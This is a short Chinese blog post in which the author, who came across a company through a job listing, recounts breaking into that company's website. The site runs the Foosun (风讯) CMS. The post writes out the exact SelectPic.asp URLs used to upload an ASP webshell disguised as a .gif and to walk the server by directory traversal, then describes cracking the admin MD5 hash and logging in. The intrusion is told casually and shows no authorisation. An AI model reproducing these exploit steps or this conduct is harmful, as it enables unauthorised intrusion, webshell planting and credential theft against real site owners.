翻开几个看看，有个公司要求还挺高的，习惯性的先看看这个公司的网站，于是有了下文。 打开它的网站，首先看了一下是什么程序写的，发现很多html，还有些asp的，没报多大希望。看到有注册用户，于是我也注册了，当鼠标移动到注册按钮上面时，我发现浏览器左下角显示的路径和文件名都很眼熟，是什么呢？啊~~对了，是风讯。 注册过程中发现和以前看到的注册页面不大一样，于是想：系统这么多，同路径同文件名的大有所在。到了注册完毕，终于看到曙光了。果然就是风讯的，赶紧找上传相片那个地方，然后用： User/CommPages/SelectPic.asp?CurrPath=/UserFiles/注册获得的ID&f_UserNumber=注册获得的ID 打开看看，接着用： User/CommPages/SelectPic.asp?CurrPath=/UserFiles/020655AC021/test.aspf_UserNumber=020655AC021 访问，选择了个asp马（后缀当然是gif了），上传成功！打开图片地址访问出错了： User/CommPages/SelectPic.asp?CurrPath=/UserFiles/test.asp&f_UserNumber=020655AC021 结果： 继续浏览一下整个网站看看有什么东西。 User/CommPages/SelectPic.asp?CurrPath=../../f_UserNumber=020655AC021 到网站根目录了： 找到管理帐号和密码（当然是从MD5破解得来的），然后又用那个漏洞找到了管理登陆处。进入。。。。 本文来源于：尼克技术博客 http://www.ineeke.cn/ , 原文地址：http://www.ineeke.cn/archives/ruqinjiancewangzhan/